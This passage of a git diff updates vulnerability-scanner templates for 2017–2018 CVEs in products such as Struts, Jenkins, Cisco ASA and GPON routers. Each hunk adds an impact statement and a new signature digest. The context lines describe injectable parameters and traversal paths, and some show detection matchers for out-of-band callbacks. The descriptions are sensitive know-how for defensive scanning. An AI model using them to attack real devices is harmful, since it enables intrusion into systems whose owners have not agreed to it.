     Update to the latest version of the WordPress Raygun4WP plugin (1.8.0 or higher) to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100df1641b2012826c52f42f7906f3144e2127b0ae4819a3cfef7991a08dab9f2c102210084cd8baf8161e0d427389ae0eaeae16a8ddd8073aa6e7931f487c1d7557e1ed5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220374994832bf2b307949a4a6cac462a65388b7fc27c85adf704b0af7b94661ff60220471580d75d6e1442f4a705dd4fdb43ff6c3014e3ae84d5923400065d52f72318:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml
index 4a5b7c9c1f..11c7eb248e 100644
--- a/http/cves/2017/CVE-2017-9416.yaml
+++ b/http/cves/2017/CVE-2017-9416.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Allows an attacker to read arbitrary files on the server.
   remediation: |
     Upgrade to a patched version of Odoo or apply the necessary security patches.
   reference:
@@ -49,4 +51,4 @@ http:
           - "contains(body, 'extensions')"
           - "status_code == 200"
         condition: and
-# digest: 4a0a004730450220713cc3114d1ffcc1099101d6f0d41f008232c07f45561b35338b0e25fdb1da81022100c2028fe7aaece120f11435df2956df0c1782c5c509199a8bd2135a206862c7d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022067848037505007c47805f20fe5f54b0e220567ffac86100514382abd8f4d923b022100c5a94d3a092fe4b836a70556af70d03ef2c225d9795f4565e1ff09ea3eaefc8d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml
index a4be7b5ff6..49a2ed119a 100644
--- a/http/cves/2017/CVE-2017-9506.yaml
+++ b/http/cves/2017/CVE-2017-9506.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.
+  impact: |
+    Successful exploitation of these vulnerabilities could lead to unauthorized access, data theft, and potential server-side attacks.
   remediation: |
     Apply the latest security patches provided by Atlassian to mitigate these vulnerabilities.
   reference:
@@ -39,4 +41,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 490a0046304402202d3edfe5965b4c92d50843cce8cad23cee57cd5029ed09328d3015ee7b5c4da2022053d0dfa7a71a0fb79cdaa61642787f42b2634be729a28f2e6db640faf98d5137:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c944ded5ed53c2586c90b55d8d776a89f707da01e95be6f8a82e036de01a86b8022007596a87df99e77294fddee5b74715c68d8ef6fe30a571fc6c41bdbd79903384:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml
index 6a80f28237..1e534b42da 100644
--- a/http/cves/2017/CVE-2017-9791.yaml
+++ b/http/cves/2017/CVE-2017-9791.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Apache Struts 2.1.x and 2.3.x  with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.
+  impact: |
+    Remote code execution
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207063b8f5c0d3ce14243ef5b9d96f81a14b1d2f9ac1002764c2cb462bc0c6fb0502203d71ad27c2a8e191fa542bc6ada9ef3b054de2fd6c950330e32fbef31af8155e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210089474676970b53af0e084b484fe46bba8974eb15aff4ac7259a7aadae18ee3e6022100f52f8ea7aca289b169b51328419cfbf6d4849af05526f53d28291051f76b8185:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml
index a6188e607b..e8099cee4b 100644
--- a/http/cves/2017/CVE-2017-9805.yaml
+++ b/http/cves/2017/CVE-2017-9805.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.
+  impact: |
+    Remote code execution
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.
   reference:
@@ -106,5 +108,4 @@ http:
       - type: status
         status:
           - 500
-
-# digest: 4b0a00483046022100fffb5572ea6a3a9e66caeba001ac48de1a809db496abc1d5367643a27b64e550022100e7862b50988b1084007910376221f62bcb95de32c3bd50681d323f776c17ecd5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008de74775ae617d65b232ac30b20f3b2c1f00fb837d7ef86fc88191d99cbc44b002200bebb1d1baeddc201ea93f0d12ce75b571f4e32151fb2519a3f69b37e13e8549:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml
index ec34aada9a..cbbec7ac42 100644
--- a/http/cves/2017/CVE-2017-9822.yaml
+++ b/http/cves/2017/CVE-2017-9822.yaml
@@ -5,6 +5,8 @@ info:
   author: milo2012
   severity: high
   description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution.
+  impact: |
+    Remote code execution through cookie deserialization
   remediation: |
     Upgrade DotNetNuke to a version higher than 9.3.0
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 4b0a004830460221009de49d3d96c011d689a49744981009d292efd483b9d3013a4e34b5051ae0bf9b022100d646a8b169f59d5930943f29950700f144316dafcdef1cfb7957fda87e13b5f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d1436a29f03225bbc77f741d51d379f4a6bb05476176a18bc040dfe820325d81022100973e591186cde8db71bdc700ee4bfd5a05c8c61ae64127de26602bdcc6618a79:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml
index 06ab787f04..9f4a7adbec 100644
--- a/http/cves/2017/CVE-2017-9833.yaml
+++ b/http/cves/2017/CVE-2017-9833.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.
+  impact: |
+    An attacker can gain unauthorized access to sensitive files on the server.
   remediation: |
     Upgrade to a patched version of BOA Web Server or apply the necessary security patches.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201633d1135b421ac7657ccd94c38e55ccea0d2592a38bde624d78c20540763ddd022100d8f1c7dbb315443b203b72f4bbe77a1a5c1c1784be5207ae08de08a2917bfd08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009341e87d05bb493b25995eaf769a88562f89476fc54ef56eb24a822bb3c6679202207c32d08d64220af1a904536d6acbfa5deb972a408d62a3e9524095eda861e26f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml
index 585d6f0be0..35aa74df43 100644
--- a/http/cves/2018/CVE-2018-0127.yaml
+++ b/http/cves/2018/CVE-2018-0127.yaml
@@ -5,6 +5,8 @@ info:
   author: jrolf
   severity: critical
   description: Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the router.
   remediation: |
     Apply the latest firmware update provided by Cisco to fix the vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502202a416bb64cf3e0113950ec3a3f1e8b1f6348d09626ed781ace544f20e7cfc3cc022100a49bea338336f3970655ea2f8171e85b04b4e3122a02948bf623fa49db29a79f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022000bf714332242c7a958ed786e041db79aba5724775b1109dbb2277c28f5dc32b02201c53d0a1fc4df1ddf01dcb1503469503dab9789a907b95583c981e3a5d64d8f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml
index 1b60f4b872..83e657f4d0 100644
--- a/http/cves/2018/CVE-2018-0296.yaml
+++ b/http/cves/2018/CVE-2018-0296.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Cisco Adaptive Security Appliances (ASA) web interfaces could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029.
+  impact: |
+    An attacker can read sensitive files on the Cisco ASA firewall, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the necessary security patches or updates provided by Cisco to fix the local file inclusion vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220591749d67de7e91d6d0c22c73372a09efc7f32ed18f885d4acb58f675c3d10f6022100f6328e5672c7fd33f411d131e660cc12be51a110d6432fe6ed8973a73c29bf1d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b887ed4c27311aed1b2f37a779838d841a9b0443459239f2393e5f10a63601f30220407b0a90f6879e7f9950bdb53baba82228c6210a398b9dd3cb3bc4934de55707:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml
index 239a15515e..c00a43fb41 100644
--- a/http/cves/2018/CVE-2018-1000129.yaml
+++ b/http/cves/2018/CVE-2018-1000129.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d9b2474dc88f49e8ff5a9d688720b146d86900580edaa17e06cbc84dc281ccff022020f52bcd699d649a08f7ce8477c1a2ec57541aaefa9c2ee4589adf855d89979d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008a61d5fe8b4c920a9ff5bed18b8666320288d3c3db08180072cfcfb376687733022058824b1359b49a021788729c453487a7d8206fe18ca070e8da78b853e891d00f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml
index 00a99d49a0..8b7ba62b87 100644
--- a/http/cves/2018/CVE-2018-1000130.yaml
+++ b/http/cves/2018/CVE-2018-1000130.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022035a0bf9da6b8b4de17fcd9f11365bce2088f366b6b86ce6ddf95008854116605022100b0fe3f9730815621d2d2da4ceae45c57b4e7cd2c6ba72fd27caa0624206f0d7e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203c5400dbefa380921393b2c141d95b7e566ef5b7a9cf099997d2e6bd57bb1021022068f5f5c50bdaaf45a919eb2611bbb7646b34a436127de86ba55b6615fa667617:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml
index 8a93f42408..a33ea7639e 100644
--- a/http/cves/2018/CVE-2018-1000533.yaml
+++ b/http/cves/2018/CVE-2018-1000533.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade GitList to version 0.6.0 or later to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
           - '<span class="name">(.*?)</span>'
         internal: true
         part: body
-# digest: 4a0a00473045022028cd8a2a8701ecac535948910b85cf15ac28cde153a381db6df360650f8daa37022100fbf3d855a5152999c5894b30f2db95489143480735950ce2d97b10f94d23ae74:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a483f2e85a0a61d5442379f553a81b168cb303b02f98d1d0184615f64f55c39802206b82f6795f61c317a25436bfaaf0c775004939d135660be36de0fac888dffdde:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml
index b25b9099e1..c05c2d8c9f 100644
--- a/http/cves/2018/CVE-2018-1000600.yaml
+++ b/http/cves/2018/CVE-2018-1000600.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the network.
   remediation: |
     Upgrade Jenkins GitHub Plugin to version 1.29.2 or later to mitigate the vulnerability.
   reference:
@@ -38,4 +40,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4b0a00483046022100e9cf698a6155fca9dd32204158eb1ec8b659d4a54543e1ab8d65c9d907853fa6022100a79c2ced0e65c6ebc706488afccd56483b0b98d52f8c99ed538c063e3450e82e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200516063b8f46f603695fe6daeb0c86266c0b5c05818b3cea995ff84873e3118402206cd2a3f491ce4f852cc50781bba8e88f14c2da1066feb45b7a7156e3ea4dc8af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml
index d8982e90cc..f9b6b8bb16 100644
--- a/http/cves/2018/CVE-2018-1000671.yaml
+++ b/http/cves/2018/CVE-2018-1000671.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Sympa (>=6.2.17) or apply the necessary security patches provided by the vendor.
   reference:
@@ -39,4 +41,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022100a1a3159a4404aadc91edeae3a062b93d520ffbd46a299d8dcda7177b69ae025d0220402761aca37d8f1495841b26b21d238435828a4efb4c5b9c88cf13e0d9f575f4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008317268039141171e9f4697b55b29acacacf55a997d3689eef2e0aadfad2a0a2022100875a37481edac3278a765ceb2b55b7ee392c0bc9416433def5dc63d3136e90df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml
index 3fdcbb8fa2..b072657853 100644
--- a/http/cves/2018/CVE-2018-1000856.yaml
+++ b/http/cves/2018/CVE-2018-1000856.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c0fc6cc177d319cac3f2c9b8ce234fe64b2eb1d62dced401cd4e839d2cc9c268022071e4e38cdfe955c22d7422e7cd0ed86e1c54342ef2297dcd2457696e1fb16f72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022013cc56c0788009e72a90ad50fb02772d4d13e0a6d8345ea9ff32111c59a227800220243ef50e4cc4f7ff9ab318d7637ef981da6ee3b7d1cd175628dad853539050fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml
index 2747d599f8..b86a645e7e 100644
--- a/http/cves/2018/CVE-2018-1000861.yaml
+++ b/http/cves/2018/CVE-2018-1000861.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK,pikpikcu
   severity: critical
   description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Jenkins server.
   remediation: |
     Apply the latest security patches and updates provided by Jenkins to mitigate this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022067b8cbd5a6dc7230eb66c5de9fe6cb0bb3389e6be67c047a0a5d09a42ed4a7c402201ec3101940d135e9ecbbbcdc0c312b7b1d2eab6d45c3467d112ee3e3d6127a90:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220392ddae9094cf42a0be96a1f52e5a7e5aba557e48d8e7626626de55207a0f5b8022100ed04daedd75764426b5b67d30c49627ec4c90d16706567bbb112087a301cc1f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml
index e421af55df..5ac89727c3 100644
--- a/http/cves/2018/CVE-2018-10093.yaml
+++ b/http/cves/2018/CVE-2018-10093.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the device, potentially leading to a complete compromise of the phone and unauthorized access to the VoIP network.
   remediation: |
     Apply the latest firmware update provided by AudioCodes to fix the vulnerability and ensure proper input validation.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022001de3a004110f8d29008c4aa47f247c0b164d240314d699d05ab8aa8de2735730221009ea6fad37b1abb7add86afab106eff2e86add605f1388dd2d0a040f71efccf04:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009a8f12052a0797f7cbbed43a8cbf98d2d2276859de246afeb55689bf0cb58581022012822d81dd35ea01de36a4407fdc3783d804bcdf3249a4936b4b7b05d08d7698:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml
index 7480f3f45a..e7c5711f9f 100644
--- a/http/cves/2018/CVE-2018-10095.yaml
+++ b/http/cves/2018/CVE-2018-10095.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Dolibarr before 7.0.2  is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to Dolibarr version 7.0.2 or later to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d22af840507ae9dfc0306cbca9efc1c1e043e6adc38d12dba17ed388e1fd8725022100e31eecc6ac20a2ef1c8654ce99f9f008cb732d3642e1d1bf5bff01307822998c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008f11a936459593b0d30f548fcdc761d05f79b578a98024c49efa84763b6dc801022100dacbb104d78edac86c44f54c8925b4f1828cadfbc0d4fa22a0406257147d09db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml
index 7184a324ac..c00e1e0697 100644
--- a/http/cves/2018/CVE-2018-10141.yaml
+++ b/http/cves/2018/CVE-2018-10141.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
   remediation: |
     Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206bd7752048e3f06146c3662900408340c7c5a96d1561cde59dab9d9a8425a759022074b40d47b3c1c1ee7bae2745e143ac5e017df6cb5b196b8cdf3e04e28fc24cb1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220472960bc7baecc2f34a1c09cd71028ea9a9246cc11771228277cb5077abdb96b02200a1a0a24c16dd85344120e450dd0385e72bfbd5ba12c3bcebfed275b1eb9880b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml
index 10df3747a6..73ab51ed55 100644
--- a/http/cves/2018/CVE-2018-10201.yaml
+++ b/http/cves/2018/CVE-2018-10201.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_akoko
   severity: high
   description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to read arbitrary files from the target system.
   remediation: |
     Apply the latest security patches or updates provided by Ncomputing to fix the directory traversal vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - "fonts"
           - "extensions"
         condition: and
-# digest: 490a0046304402202499dbec6a644a10ded40f743d9869a4ff389f5bd22856679de11d4945d8cd95022067455572f1d5ecb5f633ac5ef1a620b7bdbe498b4f5986594df2c64d99193a60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207bef5efa8ba61c5a90904662c1339b7a82a553d40a795b1ed42a79e0cd2ce78d022100a2b0fb19f6b71ce233558b6490c85c83337e0272ba51205fd9de55b7fd56d71e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml
index c9a38d62ad..02b4122bb2 100644
--- a/http/cves/2018/CVE-2018-10230.yaml
+++ b/http/cves/2018/CVE-2018-10230.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100eb10ca982816d4ade9d3f9bf7db8a36f6eaae1705c755eba520df719317baff4022100efb9e47cc8bf9d046d89f63c541cfbcd81bee10fc78f2241361c6877a02d4efa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009bf9ff58bd53c05ecebe3fe711794d2af732156efc1c103f8716fe86408cf41c022100bc9272148cc6fc921c5c666d280933eef0c2e355dc94dc54f7af82f1a461b7ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml
index 11916690fc..2ae9f2ceb2 100644
--- a/http/cves/2018/CVE-2018-10562.yaml
+++ b/http/cves/2018/CVE-2018-10562.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with root privileges on the affected device.
   remediation: |
     Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: {{useragent}}"
-# digest: 4a0a00473045022100af9795e26a105b283ac69b5a1fe23a7334d2dabd2fb77f797391ebbf97cf0c5402201aa0cb80fadb87f2685f8cd43be68f4f20130443ac0dd218aa085e06e019e2c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a9156dd7f51f9daedd85545885cd8de4310f5e2f19cc8ca01ca1a63ba36a46e00220230db4bfe7711478155d2b8593dfde09e8c16b59b2f6741dd1ec49f21c86dbb0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10818.yaml b/http/cves/2018/CVE-2018-10818.yaml
index 2ce9d11bbb..1d531d1358 100644
--- a/http/cves/2018/CVE-2018-10818.yaml
+++ b/http/cves/2018/CVE-2018-10818.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
   remediation: |
     Apply the latest firmware update provided by LG to mitigate this vulnerability.
   reference:
@@ -47,5 +49,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: {{useragent}}"
-
-# digest: 4a0a00473045022100ccb2d026c1bdc3df10c2c02d7bc19b1059c4e40e9ba5b5dcd07f77a4900f0e1502203ebc6f5387949a63d6f6166a279ef005ec5bec4c4caaf3df125ce8265eb44bc5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202b56677fec54d514978c64631558171a8f9588ca78711315dd08583d0ed373340221009dff21f2f19a0772452e60725b3701999ff6c59a8bdb380e982af97876bcb175:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml
index d5b14aeb21..f3fa73c233 100644
--- a/http/cves/2018/CVE-2018-10822.yaml
+++ b/http/cves/2018/CVE-2018-10822.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
